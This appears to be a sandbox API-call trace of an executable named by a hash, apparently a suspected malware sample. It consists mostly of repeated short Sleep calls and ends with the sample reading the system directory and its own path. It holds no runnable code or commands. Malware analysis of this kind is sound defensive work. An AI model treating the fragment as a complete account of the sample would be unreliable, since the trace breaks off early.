Sleep (dwMilliseconds=0xa) [0116.355] Sleep (dwMilliseconds=0xa) [0116.403] Sleep (dwMilliseconds=0xa) [0116.441] Sleep (dwMilliseconds=0xa) [0116.466] Sleep (dwMilliseconds=0xa) [0116.481] Sleep (dwMilliseconds=0xa) [0116.496] Sleep (dwMilliseconds=0xa) [0116.511] Sleep (dwMilliseconds=0xa) [0116.531] Sleep (dwMilliseconds=0xa) [0116.542] Sleep (dwMilliseconds=0xa) [0116.597] Sleep (dwMilliseconds=0xa) [0116.636] Sleep (dwMilliseconds=0xa) [0116.652] Sleep (dwMilliseconds=0xa) [0116.667] Sleep (dwMilliseconds=0xa) [0116.683] Sleep (dwMilliseconds=0xa) [0116.699] Sleep (dwMilliseconds=0xa) [0116.716] Sleep (dwMilliseconds=0xa) [0116.729] Sleep (dwMilliseconds=0xa) [0116.746] Sleep (dwMilliseconds=0xa) [0116.793] Sleep (dwMilliseconds=0xa) [0116.836] Sleep (dwMilliseconds=0xa) [0116.857] Sleep (dwMilliseconds=0xa) [0116.871] Sleep (dwMilliseconds=0xa) [0116.889] Sleep (dwMilliseconds=0xa) [0116.903] Sleep (dwMilliseconds=0xa) [0116.926] Sleep (dwMilliseconds=0xa) [0116.948] Sleep (dwMilliseconds=0xa) [0116.996] Sleep (dwMilliseconds=0xa) [0117.025] Sleep (dwMilliseconds=0xa) [0117.049] Sleep (dwMilliseconds=0xa) [0117.077] Sleep (dwMilliseconds=0xa) [0117.089] Sleep (dwMilliseconds=0xa) [0117.106] Sleep (dwMilliseconds=0xa) [0117.127] Sleep (dwMilliseconds=0xa) [0117.184] Sleep (dwMilliseconds=0xa) [0117.210] Sleep (dwMilliseconds=0xa) [0117.230] Sleep (dwMilliseconds=0xa) [0117.245] Sleep (dwMilliseconds=0xa) [0117.262] Sleep (dwMilliseconds=0xa) [0117.279] Sleep (dwMilliseconds=0xa) [0117.456] Sleep (dwMilliseconds=0xa) [0117.500] Sleep (dwMilliseconds=0xa) [0117.547] Sleep (dwMilliseconds=0xa) [0117.562] Sleep (dwMilliseconds=0xa) [0117.606] Sleep (dwMilliseconds=0xa) [0117.651] Sleep (dwMilliseconds=0xa) [0117.670] Sleep (dwMilliseconds=0xa) [0117.717] Sleep (dwMilliseconds=0xa) [0117.770] Sleep (dwMilliseconds=0xa) [0117.807] Sleep (dwMilliseconds=0xa) [0117.830] Sleep (dwMilliseconds=0xa) [0117.856] Sleep (dwMilliseconds=0xa) [0117.933] Sleep (dwMilliseconds=0xa) [0117.977] Sleep (dwMilliseconds=0xa) [0117.996] Sleep (dwMilliseconds=0xa) [0118.011] Sleep (dwMilliseconds=0xa) [0118.027] Sleep (dwMilliseconds=0xa) [0118.043] Sleep (dwMilliseconds=0xa) [0118.058] Sleep (dwMilliseconds=0xa) [0118.075] Sleep (dwMilliseconds=0xa) [0118.089] Sleep (dwMilliseconds=0xa) [0118.136] Sleep (dwMilliseconds=0xa) [0118.167] Sleep (dwMilliseconds=0xa) [0118.191] Sleep (dwMilliseconds=0xa) [0118.215] Sleep (dwMilliseconds=0xa) [0118.231] Sleep (dwMilliseconds=0xa) [0118.245] Sleep (dwMilliseconds=0xa) [0118.263] Sleep (dwMilliseconds=0xa) [0118.277] Sleep (dwMilliseconds=0xa) [0118.329] Sleep (dwMilliseconds=0xa) [0118.369] Sleep (dwMilliseconds=0xa) [0118.386] Sleep (dwMilliseconds=0xa) [0118.405] Sleep (dwMilliseconds=0xa) [0118.419] Sleep (dwMilliseconds=0xa) [0118.433] Sleep (dwMilliseconds=0xa) [0118.448] Sleep (dwMilliseconds=0xa) [0118.464] Sleep (dwMilliseconds=0xa) [0118.496] Sleep (dwMilliseconds=0xa) [0118.548] Sleep (dwMilliseconds=0xa) [0118.585] Sleep (dwMilliseconds=0xa) [0118.606] Sleep (dwMilliseconds=0xa) [0118.621] Sleep (dwMilliseconds=0xa) [0118.638] Sleep (dwMilliseconds=0xa) [0118.672] Sleep (dwMilliseconds=0xa) [0118.684] Sleep (dwMilliseconds=0xa) [0118.699] Sleep (dwMilliseconds=0xa) [0118.746] Sleep (dwMilliseconds=0xa) [0118.796] Sleep (dwMilliseconds=0xa) [0118.811] Sleep (dwMilliseconds=0xa) [0118.823] Sleep (dwMilliseconds=0xa) [0118.840] Sleep (dwMilliseconds=0xa) [0118.855] Sleep (dwMilliseconds=0xa) [0118.871] Sleep (dwMilliseconds=0xa) [0118.887] Sleep (dwMilliseconds=0xa) [0118.902] Sleep (dwMilliseconds=0xa) [0118.950] Sleep (dwMilliseconds=0xa) [0119.014] Sleep (dwMilliseconds=0xa) [0119.027] Sleep (dwMilliseconds=0xa) [0119.042] Sleep (dwMilliseconds=0xa) [0119.061] Sleep (dwMilliseconds=0xa) [0119.073] Sleep (dwMilliseconds=0xa) [0119.089] Sleep (dwMilliseconds=0xa) [0119.104] Sleep (dwMilliseconds=0xa) [0119.168] Sleep (dwMilliseconds=0xa) [0119.197] Sleep (dwMilliseconds=0xa) [0119.216] Sleep (dwMilliseconds=0xa) [0119.230] Sleep (dwMilliseconds=0xa) [0119.245] Sleep (dwMilliseconds=0xa) [0119.262] Sleep (dwMilliseconds=0xa) [0119.280] Sleep (dwMilliseconds=0xa) [0119.292] Sleep (dwMilliseconds=0xa) [0119.309] Sleep (dwMilliseconds=0xa) [0119.357] Sleep (dwMilliseconds=0xa) [0119.403] Sleep (dwMilliseconds=0xa) [0119.419] Sleep (dwMilliseconds=0xa) [0119.433] Sleep (dwMilliseconds=0xa) [0119.452] Sleep (dwMilliseconds=0xa) [0119.466] Sleep (dwMilliseconds=0xa) [0119.487] Sleep (dwMilliseconds=0xa) [0119.512] Sleep (dwMilliseconds=0xa) [0119.527] Sleep (dwMilliseconds=0xa) [0119.584] Sleep (dwMilliseconds=0xa) [0119.633] Sleep (dwMilliseconds=0xa) [0119.653] Sleep (dwMilliseconds=0xa) [0119.730] Sleep (dwMilliseconds=0xa) [0119.781] Sleep (dwMilliseconds=0xa) [0119.824] Sleep (dwMilliseconds=0xa) [0119.850] Sleep (dwMilliseconds=0xa) [0119.875] Sleep (dwMilliseconds=0xa) [0119.886] Sleep (dwMilliseconds=0xa) [0119.903] Sleep (dwMilliseconds=0xa) [0119.917] Sleep (dwMilliseconds=0xa) [0119.933] Sleep (dwMilliseconds=0xa) [0119.985] Sleep (dwMilliseconds=0xa) [0120.023] Sleep (dwMilliseconds=0xa) [0120.042] Sleep (dwMilliseconds=0xa) [0120.058] Sleep (dwMilliseconds=0xa) [0120.073] Sleep (dwMilliseconds=0xa) [0120.089] Sleep (dwMilliseconds=0xa) [0120.106] Sleep (dwMilliseconds=0xa) [0120.122] Sleep (dwMilliseconds=0xa) [0120.136] Sleep (dwMilliseconds=0xa) [0120.186] Sleep (dwMilliseconds=0xa) [0120.225] Sleep (dwMilliseconds=0xa) [0120.245] Sleep (dwMilliseconds=0xa) [0120.262] Sleep (dwMilliseconds=0xa) [0120.278] Sleep (dwMilliseconds=0xa) [0120.339] Sleep (dwMilliseconds=0xa) [0120.378] Sleep (dwMilliseconds=0xa) [0120.448] Sleep (dwMilliseconds=0xa) [0120.463] Sleep (dwMilliseconds=0xa) [0120.478] Sleep (dwMilliseconds=0xa) [0120.493] Sleep (dwMilliseconds=0xa) [0120.510] Sleep (dwMilliseconds=0xa) [0120.525] Sleep (dwMilliseconds=0xa) [0120.541] Sleep (dwMilliseconds=0xa) [0120.602] Sleep (dwMilliseconds=0xa) [0120.646] Sleep (dwMilliseconds=0xa) [0120.667] Sleep (dwMilliseconds=0xa) [0120.680] Sleep (dwMilliseconds=0xa) [0120.696] Sleep (dwMilliseconds=0xa) [0120.714] Sleep (dwMilliseconds=0xa) [0120.728] Sleep (dwMilliseconds=0xa) [0120.742] Sleep (dwMilliseconds=0xa) [0120.793] Sleep (dwMilliseconds=0xa) [0120.841] Sleep (dwMilliseconds=0xa) [0120.929] Sleep (dwMilliseconds=0xa) [0120.947] Sleep (dwMilliseconds=0xa) [0120.962] Sleep (dwMilliseconds=0xa) [0120.978] Sleep (dwMilliseconds=0xa) [0120.993] Sleep (dwMilliseconds=0xa) [0121.009] Sleep (dwMilliseconds=0xa) [0121.026] Sleep (dwMilliseconds=0xa) [0121.042] Sleep (dwMilliseconds=0xa) [0121.091] Sleep (dwMilliseconds=0xa) [0121.131] Sleep (dwMilliseconds=0xa) [0121.150] Sleep (dwMilliseconds=0xa) [0121.167] Sleep (dwMilliseconds=0xa) [0121.182] Sleep (dwMilliseconds=0xa) [0121.195] Sleep (dwMilliseconds=0xa) [0121.214] Sleep (dwMilliseconds=0xa) [0121.228] Sleep (dwMilliseconds=0xa) [0121.243] Sleep (dwMilliseconds=0xa) [0121.291] Sleep (dwMilliseconds=0xa) [0121.333] Sleep (dwMilliseconds=0xa) [0121.353] Sleep (dwMilliseconds=0xa) [0121.368] Sleep (dwMilliseconds=0xa) [0121.383] Sleep (dwMilliseconds=0xa) [0121.400] Sleep (dwMilliseconds=0xa) [0121.415] Sleep (dwMilliseconds=0xa) [0121.477] Sleep (dwMilliseconds=0xa) [0121.524] Sleep (dwMilliseconds=0xa) [0121.552] Sleep (dwMilliseconds=0xa) [0121.568] Sleep (dwMilliseconds=0xa) [0121.581] Sleep (dwMilliseconds=0xa) [0121.596] Sleep (dwMilliseconds=0xa) [0121.617] Sleep (dwMilliseconds=0xa) [0121.675] Sleep (dwMilliseconds=0xa) [0121.740] Sleep (dwMilliseconds=0xa) [0121.790] Sleep (dwMilliseconds=0xa) [0121.807] Sleep (dwMilliseconds=0xa) [0121.822] Sleep (dwMilliseconds=0xa) [0121.838] Sleep (dwMilliseconds=0xa) [0121.853] Sleep (dwMilliseconds=0xa) [0121.908] Sleep (dwMilliseconds=0xa) [0121.948] Sleep (dwMilliseconds=0xa) [0121.962] Sleep (dwMilliseconds=0xa) [0121.978] Sleep (dwMilliseconds=0xa) [0121.994] Sleep (dwMilliseconds=0xa) [0122.011] Sleep (dwMilliseconds=0xa) [0122.025] Sleep (dwMilliseconds=0xa) [0122.262] Sleep (dwMilliseconds=0xa) [0122.310] Sleep (dwMilliseconds=0xa) [0122.340] Sleep (dwMilliseconds=0xa) [0122.356] Sleep (dwMilliseconds=0xa) [0122.369] Sleep (dwMilliseconds=0xa) [0122.384] Sleep (dwMilliseconds=0xa) [0122.399] Sleep (dwMilliseconds=0xa) [0122.415] Sleep (dwMilliseconds=0xa) [0122.432] Sleep (dwMilliseconds=0xa) [0122.447] Sleep (dwMilliseconds=0xa) [0122.495] Sleep (dwMilliseconds=0xa) [0122.529] Sleep (dwMilliseconds=0xa) [0122.548] Sleep (dwMilliseconds=0xa) [0122.572] Sleep (dwMilliseconds=0xa) [0122.589] Sleep (dwMilliseconds=0xa) [0122.615] Sleep (dwMilliseconds=0xa) [0122.681] Sleep (dwMilliseconds=0xa) [0122.736] Sleep (dwMilliseconds=0xa) [0122.760] Sleep (dwMilliseconds=0xa) [0122.799] Sleep (dwMilliseconds=0xa) [0122.821] Sleep (dwMilliseconds=0xa) [0122.884] Sleep (dwMilliseconds=0xa) [0122.931] Sleep (dwMilliseconds=0xa) [0122.948] Sleep (dwMilliseconds=0xa) [0122.963] Sleep (dwMilliseconds=0xa) [0122.978] Sleep (dwMilliseconds=0xa) [0122.996] Sleep (dwMilliseconds=0xa) [0123.010] Sleep (dwMilliseconds=0xa) [0123.025] Sleep (dwMilliseconds=0xa) [0123.041] Sleep (dwMilliseconds=0xa) [0123.087] Sleep (dwMilliseconds=0xa) [0123.112] Sleep (dwMilliseconds=0xa) [0123.134] Sleep (dwMilliseconds=0xa) [0123.151] Sleep (dwMilliseconds=0xa) [0123.165] Sleep (dwMilliseconds=0xa) [0123.181] Sleep (dwMilliseconds=0xa) [0123.200] Sleep (dwMilliseconds=0xa) [0123.214] Sleep (dwMilliseconds=0xa) [0123.369] Sleep (dwMilliseconds=0xa) [0123.427] Sleep (dwMilliseconds=0xa) [0123.458] Sleep (dwMilliseconds=0xa) [0123.480] Sleep (dwMilliseconds=0xa) [0123.493] Sleep (dwMilliseconds=0xa) [0123.509] Sleep (dwMilliseconds=0xa) [0123.524] Sleep (dwMilliseconds=0xa) [0123.540] Sleep (dwMilliseconds=0xa) [0123.557] Sleep (dwMilliseconds=0xa) [0123.573] Sleep (dwMilliseconds=0xa) [0123.626] Sleep (dwMilliseconds=0xa) [0123.658] Sleep (dwMilliseconds=0xa) [0123.687] Sleep (dwMilliseconds=0xa) [0123.713] Sleep (dwMilliseconds=0xa) [0123.728] Sleep (dwMilliseconds=0xa) [0123.743] Sleep (dwMilliseconds=0xa) [0123.837] Sleep (dwMilliseconds=0xa) [0123.879] Sleep (dwMilliseconds=0xa) [0123.899] Sleep (dwMilliseconds=0xa) [0123.915] Sleep (dwMilliseconds=0xa) [0123.932] Sleep (dwMilliseconds=0xa) [0123.946] Sleep (dwMilliseconds=0xa) [0123.973] Sleep (dwMilliseconds=0xa) [0123.993] Sleep (dwMilliseconds=0xa) [0124.041] Sleep (dwMilliseconds=0xa) [0124.064] Sleep (dwMilliseconds=0xa) [0124.087] Sleep (dwMilliseconds=0xa) [0124.102] Sleep (dwMilliseconds=0xa) [0124.118] Sleep (dwMilliseconds=0xa) [0124.134] Sleep (dwMilliseconds=0xa) [0124.150] Sleep (dwMilliseconds=0xa) [0124.212] Sleep (dwMilliseconds=0xa) [0124.233] Sleep (dwMilliseconds=0xa) [0124.260] Sleep (dwMilliseconds=0xa) [0124.274] Sleep (dwMilliseconds=0xa) [0124.290] Sleep (dwMilliseconds=0xa) [0124.306] Sleep (dwMilliseconds=0xa) [0124.321] Sleep (dwMilliseconds=0xa) [0124.385] Sleep (dwMilliseconds=0xa) [0124.425] Sleep (dwMilliseconds=0xa) [0124.446] Sleep (dwMilliseconds=0xa) [0124.462] Sleep (dwMilliseconds=0xa) [0124.477] Sleep (dwMilliseconds=0xa) [0124.513] Sleep (dwMilliseconds=0xa) [0124.525] Sleep (dwMilliseconds=0xa) [0124.540] Sleep (dwMilliseconds=0xa) [0124.587] Sleep (dwMilliseconds=0xa) [0124.634] Sleep (dwMilliseconds=0xa) [0124.649] Sleep (dwMilliseconds=0xa) [0124.665] Sleep (dwMilliseconds=0xa) [0124.681] Sleep (dwMilliseconds=0xa) [0124.696] Sleep (dwMilliseconds=0xa) [0124.712] Sleep (dwMilliseconds=0xa) [0124.728] Sleep (dwMilliseconds=0xa) [0124.743] Sleep (dwMilliseconds=0xa) [0124.759] Sleep (dwMilliseconds=0xa) [0124.828] Sleep (dwMilliseconds=0xa) [0124.856] Sleep (dwMilliseconds=0xa) [0124.876] Sleep (dwMilliseconds=0xa) [0124.899] Sleep (dwMilliseconds=0xa) [0124.915] Sleep (dwMilliseconds=0xa) [0124.931] Sleep (dwMilliseconds=0xa) [0124.947] Sleep (dwMilliseconds=0xa) [0124.962] Sleep (dwMilliseconds=0xa) [0125.042] Sleep (dwMilliseconds=0xa) [0125.067] Sleep (dwMilliseconds=0xa) [0125.087] Sleep (dwMilliseconds=0xa) [0125.102] Sleep (dwMilliseconds=0xa) [0125.118] Sleep (dwMilliseconds=0xa) [0125.134] Sleep (dwMilliseconds=0xa) [0125.149] Sleep (dwMilliseconds=0xa) [0125.212] Sleep (dwMilliseconds=0xa) [0125.254] Sleep (dwMilliseconds=0xa) [0125.274] Sleep (dwMilliseconds=0xa) [0125.290] Sleep (dwMilliseconds=0xa) [0125.305] Sleep (dwMilliseconds=0xa) [0125.321] Sleep (dwMilliseconds=0xa) [0125.337] Sleep (dwMilliseconds=0xa) [0125.353] Sleep (dwMilliseconds=0xa) [0125.371] Sleep (dwMilliseconds=0xa) [0125.406] Sleep (dwMilliseconds=0xa) [0125.462] Sleep (dwMilliseconds=0xa) [0125.481] Sleep (dwMilliseconds=0xa) [0125.496] Sleep (dwMilliseconds=0xa) [0125.512] Sleep (dwMilliseconds=0xa) [0125.527] Sleep (dwMilliseconds=0xa) [0125.543] Sleep (dwMilliseconds=0xa) [0125.562] Sleep (dwMilliseconds=0xa) [0125.577] Sleep (dwMilliseconds=0xa) [0125.627] Sleep (dwMilliseconds=0xa) [0125.683] Sleep (dwMilliseconds=0xa) [0125.699] Sleep (dwMilliseconds=0xa) [0125.715] Sleep (dwMilliseconds=0xa) [0125.734] Sleep (dwMilliseconds=0xa) [0125.746] Sleep (dwMilliseconds=0xa) [0125.765] Sleep (dwMilliseconds=0xa) [0125.780] Sleep (dwMilliseconds=0xa) [0125.821] Sleep (dwMilliseconds=0xa) [0125.941] Sleep (dwMilliseconds=0xa) [0125.965] Sleep (dwMilliseconds=0xa) [0125.981] Sleep (dwMilliseconds=0xa) [0125.999] Sleep (dwMilliseconds=0xa) [0126.012] Sleep (dwMilliseconds=0xa) [0126.030] Sleep (dwMilliseconds=0xa) [0126.086] Sleep (dwMilliseconds=0xa) [0126.155] Sleep (dwMilliseconds=0xa) [0126.173] Sleep (dwMilliseconds=0xa) [0126.202] Sleep (dwMilliseconds=0xa) [0126.217] Sleep (dwMilliseconds=0xa) [0126.230] Sleep (dwMilliseconds=0xa) [0126.250] Sleep (dwMilliseconds=0xa) [0126.262] Sleep (dwMilliseconds=0xa) [0126.312] Sleep (dwMilliseconds=0xa) [0126.353] Sleep (dwMilliseconds=0xa) [0126.371] Sleep (dwMilliseconds=0xa) [0126.389] Sleep (dwMilliseconds=0xa) [0126.407] Sleep (dwMilliseconds=0xa) [0126.421] Sleep (dwMilliseconds=0xa) [0126.456] Sleep (dwMilliseconds=0xa) [0126.508] Sleep (dwMilliseconds=0xa) [0126.553] Sleep (dwMilliseconds=0xa) [0126.575] Sleep (dwMilliseconds=0xa) [0126.590] Sleep (dwMilliseconds=0xa) [0126.606] Sleep (dwMilliseconds=0xa) [0126.629] Sleep (dwMilliseconds=0xa) [0126.652] Sleep (dwMilliseconds=0xa) [0126.670] Sleep (dwMilliseconds=0xa) [0126.684] Sleep (dwMilliseconds=0xa) [0126.735] Sleep (dwMilliseconds=0xa) [0126.771] Sleep (dwMilliseconds=0xa) [0126.861] Sleep (dwMilliseconds=0xa) [0126.930] Sleep (dwMilliseconds=0xa) [0126.981] Sleep (dwMilliseconds=0xa) [0126.996] Sleep (dwMilliseconds=0xa) [0127.013] Sleep (dwMilliseconds=0xa) [0127.039] Sleep (dwMilliseconds=0xa) [0127.062] Sleep (dwMilliseconds=0xa) [0127.074] Sleep (dwMilliseconds=0xa) [0127.090] Sleep (dwMilliseconds=0xa) [0127.144] Sleep (dwMilliseconds=0xa) [0127.196] Sleep (dwMilliseconds=0xa) [0127.224] Sleep (dwMilliseconds=0xa) [0127.247] Sleep (dwMilliseconds=0xa) [0127.265] Sleep (dwMilliseconds=0xa) [0127.278] Sleep (dwMilliseconds=0xa) [0127.294] Sleep (dwMilliseconds=0xa) [0127.310] Sleep (dwMilliseconds=0xa) [0127.365] Sleep (dwMilliseconds=0xa) [0127.410] Sleep (dwMilliseconds=0xa) [0127.434] Sleep (dwMilliseconds=0xa) [0127.450] Sleep (dwMilliseconds=0xa) [0127.466] Sleep (dwMilliseconds=0xa) [0127.481] Sleep (dwMilliseconds=0xa) [0127.496] Sleep (dwMilliseconds=0xa) [0127.513] Sleep (dwMilliseconds=0xa) [0127.528] Sleep (dwMilliseconds=0xa) [0127.575] Sleep (dwMilliseconds=0xa) [0127.620] Sleep (dwMilliseconds=0xa) [0127.654] Sleep (dwMilliseconds=0xa) [0127.670] Sleep (dwMilliseconds=0xa) [0127.688] Sleep (dwMilliseconds=0xa) [0127.707] Sleep (dwMilliseconds=0xa) [0127.769] Sleep (dwMilliseconds=0xa) [0127.817] Sleep (dwMilliseconds=0xa) [0127.859] Sleep (dwMilliseconds=0xa) [0127.901] Sleep (dwMilliseconds=0xa) [0127.921] Sleep (dwMilliseconds=0xa) [0127.934] Sleep (dwMilliseconds=0xa) [0127.950] Sleep (dwMilliseconds=0xa) [0127.965] Sleep (dwMilliseconds=0xa) [0128.005] Sleep (dwMilliseconds=0xa) [0128.131] Sleep (dwMilliseconds=0xa) [0128.779] Sleep (dwMilliseconds=0xa) [0128.866] Sleep (dwMilliseconds=0xa) [0128.911] Sleep (dwMilliseconds=0xa) [0128.948] Sleep (dwMilliseconds=0xa) [0128.970] Sleep (dwMilliseconds=0xa) [0129.014] Sleep (dwMilliseconds=0xa) [0129.057] Sleep (dwMilliseconds=0xa) [0129.108] Sleep (dwMilliseconds=0xa) [0129.131] Sleep (dwMilliseconds=0xa) [0129.156] Sleep (dwMilliseconds=0xa) [0129.285] Sleep (dwMilliseconds=0xa) [0129.344] Sleep (dwMilliseconds=0xa) [0129.391] Sleep (dwMilliseconds=0xa) [0129.405] Sleep (dwMilliseconds=0xa) [0129.418] Sleep (dwMilliseconds=0xa) [0129.439] Sleep (dwMilliseconds=0xa) [0129.505] Sleep (dwMilliseconds=0xa) [0129.550] Sleep (dwMilliseconds=0xa) [0129.594] Sleep (dwMilliseconds=0xa) [0129.619] Sleep (dwMilliseconds=0xa) [0129.638] Sleep (dwMilliseconds=0xa) [0129.652] Sleep (dwMilliseconds=0xa) [0129.668] Sleep (dwMilliseconds=0xa) [0129.685] Sleep (dwMilliseconds=0xa) [0129.699] Sleep (dwMilliseconds=0xa) [0129.715] Sleep (dwMilliseconds=0xa) [0129.781] Sleep (dwMilliseconds=0xa) [0129.828] Sleep (dwMilliseconds=0xa) [0129.840] Sleep (dwMilliseconds=0xa) [0129.856] Sleep (dwMilliseconds=0xa) [0129.872] Sleep (dwMilliseconds=0xa) [0129.889] Sleep (dwMilliseconds=0xa) [0129.902] Sleep (dwMilliseconds=0xa) [0129.922] Sleep (dwMilliseconds=0xa) [0129.934] Sleep (dwMilliseconds=0xa) [0129.949] Sleep (dwMilliseconds=0xa) [0129.999] Sleep (dwMilliseconds=0xa) [0130.049] Sleep (dwMilliseconds=0xa) [0130.083] Sleep (dwMilliseconds=0xa) [0130.106] Sleep (dwMilliseconds=0xa) [0130.123] Sleep (dwMilliseconds=0xa) [0130.137] Sleep (dwMilliseconds=0xa) [0130.202] Sleep (dwMilliseconds=0xa) [0130.249] Sleep (dwMilliseconds=0xa) [0130.263] Sleep (dwMilliseconds=0xa) [0130.278] Sleep (dwMilliseconds=0xa) [0130.294] Sleep (dwMilliseconds=0xa) [0130.311] Sleep (dwMilliseconds=0xa) [0130.330] Sleep (dwMilliseconds=0xa) [0130.350] Sleep (dwMilliseconds=0xa) [0130.415] Sleep (dwMilliseconds=0xa) [0130.547] Sleep (dwMilliseconds=0xa) [0130.581] Sleep (dwMilliseconds=0xa) [0130.610] Sleep (dwMilliseconds=0xa) [0130.624] Sleep (dwMilliseconds=0xa) [0130.638] Sleep (dwMilliseconds=0xa) [0130.652] Sleep (dwMilliseconds=0xa) [0130.677] Sleep (dwMilliseconds=0xa) [0130.721] Sleep (dwMilliseconds=0xa) [0130.782] Sleep (dwMilliseconds=0xa) [0130.816] Sleep (dwMilliseconds=0xa) [0130.842] Sleep (dwMilliseconds=0xa) [0130.856] Sleep (dwMilliseconds=0xa) [0130.872] Sleep (dwMilliseconds=0xa) [0130.889] Sleep (dwMilliseconds=0xa) [0130.908] Sleep (dwMilliseconds=0xa) [0130.971] Sleep (dwMilliseconds=0xa) [0131.016] Sleep (dwMilliseconds=0xa) [0131.029] Sleep (dwMilliseconds=0xa) [0131.046] Sleep (dwMilliseconds=0xa) [0131.059] Sleep (dwMilliseconds=0xa) [0131.075] Sleep (dwMilliseconds=0xa) [0131.092] Sleep (dwMilliseconds=0xa) [0131.106] Sleep (dwMilliseconds=0xa) [0131.121] Sleep (dwMilliseconds=0xa) [0131.137] Sleep (dwMilliseconds=0xa) [0131.187] Sleep (dwMilliseconds=0xa) [0131.231] Sleep (dwMilliseconds=0xa) [0131.246] Sleep (dwMilliseconds=0xa) [0131.262] Sleep (dwMilliseconds=0xa) [0131.279] Sleep (dwMilliseconds=0xa) [0131.293] Sleep (dwMilliseconds=0xa) [0131.312] Sleep (dwMilliseconds=0xa) [0131.324] Sleep (dwMilliseconds=0xa) [0131.387] Sleep (dwMilliseconds=0xa) [0131.436] Sleep (dwMilliseconds=0xa) [0131.451] Sleep (dwMilliseconds=0xa) [0131.467] Sleep (dwMilliseconds=0xa) [0131.483] Sleep (dwMilliseconds=0xa) [0131.532] Sleep (dwMilliseconds=0xa) [0131.565] Sleep (dwMilliseconds=0xa) [0131.611] Sleep (dwMilliseconds=0xa) [0131.657] Sleep (dwMilliseconds=0xa) [0131.676] Sleep (dwMilliseconds=0xa) [0131.699] Sleep (dwMilliseconds=0xa) [0131.715] Sleep (dwMilliseconds=0xa) [0131.740] Sleep (dwMilliseconds=0xa) [0131.765] Sleep (dwMilliseconds=0xa) [0131.828] Sleep (dwMilliseconds=0xa) [0131.891] Sleep (dwMilliseconds=0xa) [0131.903] Sleep (dwMilliseconds=0xa) [0131.918] Sleep (dwMilliseconds=0xa) [0131.935] Sleep (dwMilliseconds=0xa) [0131.950] Sleep (dwMilliseconds=0xa) [0131.969] Sleep (dwMilliseconds=0xa) [0131.981] Sleep (dwMilliseconds=0xa) [0132.062] Sleep (dwMilliseconds=0xa) [0132.106] Sleep (dwMilliseconds=0xa) [0132.121] Sleep (dwMilliseconds=0xa) [0132.138] Sleep (dwMilliseconds=0xa) [0132.153] Sleep (dwMilliseconds=0xa) [0132.168] Sleep (dwMilliseconds=0xa) [0132.184] Sleep (dwMilliseconds=0xa) [0132.201] Sleep (dwMilliseconds=0xa) [0132.215] Sleep (dwMilliseconds=0xa) [0132.233] Sleep (dwMilliseconds=0xa) [0132.280] Sleep (dwMilliseconds=0xa) [0132.327] Sleep (dwMilliseconds=0xa) [0132.341] Sleep (dwMilliseconds=0xa) [0132.356] Sleep (dwMilliseconds=0xa) [0132.371] Sleep (dwMilliseconds=0xa) [0132.387] Sleep (dwMilliseconds=0xa) [0132.406] Sleep (dwMilliseconds=0xa) [0132.421] Sleep (dwMilliseconds=0xa) [0132.437] Sleep (dwMilliseconds=0xa) [0132.484] Sleep (dwMilliseconds=0xa) [0132.558] Sleep (dwMilliseconds=0xa) [0132.574] Sleep (dwMilliseconds=0xa) [0132.593] Sleep (dwMilliseconds=0xa) [0132.609] Sleep (dwMilliseconds=0xa) [0132.625] Sleep (dwMilliseconds=0xa) [0132.640] Sleep (dwMilliseconds=0xa) [0132.655] Sleep (dwMilliseconds=0xa) [0132.670] Sleep (dwMilliseconds=0xa) [0132.715] Sleep (dwMilliseconds=0xa) [0132.776] Sleep (dwMilliseconds=0xa) [0132.797] Sleep (dwMilliseconds=0xa) [0132.812] Sleep (dwMilliseconds=0xa) [0132.825] Sleep (dwMilliseconds=0xa) [0132.844] Sleep (dwMilliseconds=0xa) [0132.868] Sleep (dwMilliseconds=0xa) [0132.910] Sleep (dwMilliseconds=0xa) [0132.963] Sleep (dwMilliseconds=0xa) [0133.017] Sleep (dwMilliseconds=0xa) [0133.045] Sleep (dwMilliseconds=0xa) [0133.064] Sleep (dwMilliseconds=0xa) [0133.091] Sleep (dwMilliseconds=0xa) [0133.106] Sleep (dwMilliseconds=0xa) [0133.187] Sleep (dwMilliseconds=0xa) [0133.231] Sleep (dwMilliseconds=0xa) [0133.255] Sleep (dwMilliseconds=0xa) [0133.282] Sleep (dwMilliseconds=0xa) [0133.296] Sleep (dwMilliseconds=0xa) [0133.309] Sleep (dwMilliseconds=0xa) [0133.325] Sleep (dwMilliseconds=0xa) [0133.342] Sleep (dwMilliseconds=0xa) [0133.406] Sleep (dwMilliseconds=0xa) [0133.575] Sleep (dwMilliseconds=0xa) [0133.625] Sleep (dwMilliseconds=0xa) [0133.708] Sleep (dwMilliseconds=0xa) [0133.794] Sleep (dwMilliseconds=0xa) [0133.879] Sleep (dwMilliseconds=0xa) [0133.929] Sleep (dwMilliseconds=0xa) [0133.963] Sleep (dwMilliseconds=0xa) [0134.062] Sleep (dwMilliseconds=0xa) [0134.119] Sleep (dwMilliseconds=0xa) [0134.139] Sleep (dwMilliseconds=0xa) [0134.153] Sleep (dwMilliseconds=0xa) [0134.168] Sleep (dwMilliseconds=0xa) [0134.185] Sleep (dwMilliseconds=0xa) [0134.229] Sleep (dwMilliseconds=0xa) [0134.246] Sleep (dwMilliseconds=0xa) [0134.299] Sleep (dwMilliseconds=0xa) [0134.344] Sleep (dwMilliseconds=0xa) [0134.360] Sleep (dwMilliseconds=0xa) [0134.375] Sleep (dwMilliseconds=0xa) [0134.387] Sleep (dwMilliseconds=0xa) [0134.405] Sleep (dwMilliseconds=0xa) [0134.419] Sleep (dwMilliseconds=0xa) [0134.434] Sleep (dwMilliseconds=0xa) [0134.449] Sleep (dwMilliseconds=0xa) [0134.512] Sleep (dwMilliseconds=0xa) [0134.605] Sleep (dwMilliseconds=0xa) [0134.622] Sleep (dwMilliseconds=0xa) [0134.640] Sleep (dwMilliseconds=0xa) [0134.653] Sleep (dwMilliseconds=0xa) [0134.671] Sleep (dwMilliseconds=0xa) [0134.687] Sleep (dwMilliseconds=0xa) [0134.702] Sleep (dwMilliseconds=0xa) [0134.715] Sleep (dwMilliseconds=0xa) [0134.746] Sleep (dwMilliseconds=0xa) [0134.797] Sleep (dwMilliseconds=0xa) [0134.846] GetSystemDirectoryA (in: lpBuffer=0xfeefde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0134.846] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe") 